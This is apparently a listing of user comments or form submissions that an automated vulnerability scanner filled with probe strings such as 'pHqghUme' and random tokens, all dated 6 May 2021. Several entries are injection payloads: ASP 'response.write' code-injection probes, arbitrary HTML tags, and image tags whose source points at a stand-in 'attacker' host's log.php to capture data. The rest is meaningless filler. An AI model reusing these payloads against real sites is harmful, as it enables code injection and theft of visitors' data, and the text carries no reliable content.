
  1


 • pHqghUme

  2021-05-06 09:18:53


  1


 • '+response.write(9090330*9879645)+'

  2021-05-06 09:18:51


  1


 • pHqghUme

  2021-05-06 09:18:49


  1


 • response.write(9090330*9879645)

  2021-05-06 09:18:49


  1


 • pHqghUme

  2021-05-06 09:18:48


  1


 • pHqghUme

  2021-05-06 09:18:47


  1


 • pHqghUme

  2021-05-06 09:18:47


  1


 • pHqghUme

  2021-05-06 09:18:46


  1


 • pHqghUme

  2021-05-06 09:18:45


  1


 • pHqghUme

  2021-05-06 09:18:45


  5A718yen


 • pHqghUme

  2021-05-06 09:18:44


  1


 • G367t4vv

  2021-05-06 09:18:44


  1


 • pHqghUme

  2021-05-06 09:18:44


  1


 • pHqghUme

  2021-05-06 09:18:42


  1


 • pHqghUme

  2021-05-06 09:18:41


  1


 • pHqghUme

  2021-05-06 09:18:28


  1


 • pHqghUme

  2021-05-06 09:18:04


  1DRZSChXgYO


 • 1CCC4YQHcpO

  2021-05-06 09:18:02


  1


 • pHqghUme

  2021-05-06 09:18:01


  1


 • pHqghUme

  2021-05-06 09:18:00


  1


 • pHqghUme

  2021-05-06 09:06:27


  1


 • pHqghUme<nZXE4W<

  2021-05-06 04:02:50


  1


 • pHqghUme

  2021-05-06 04:02:48


  1<UIxXiw<


 • pHqghUme<img sRc='http://attacker-9828/log.php?

  2021-05-06 04:02:42


  1


 • pHqghUme

  2021-05-06 04:02:36


  1<img sRc='http://attacker-9851/log.php?


 • pHqghUme<sngkLf x=9046>

  2021-05-06 04:02:32


  1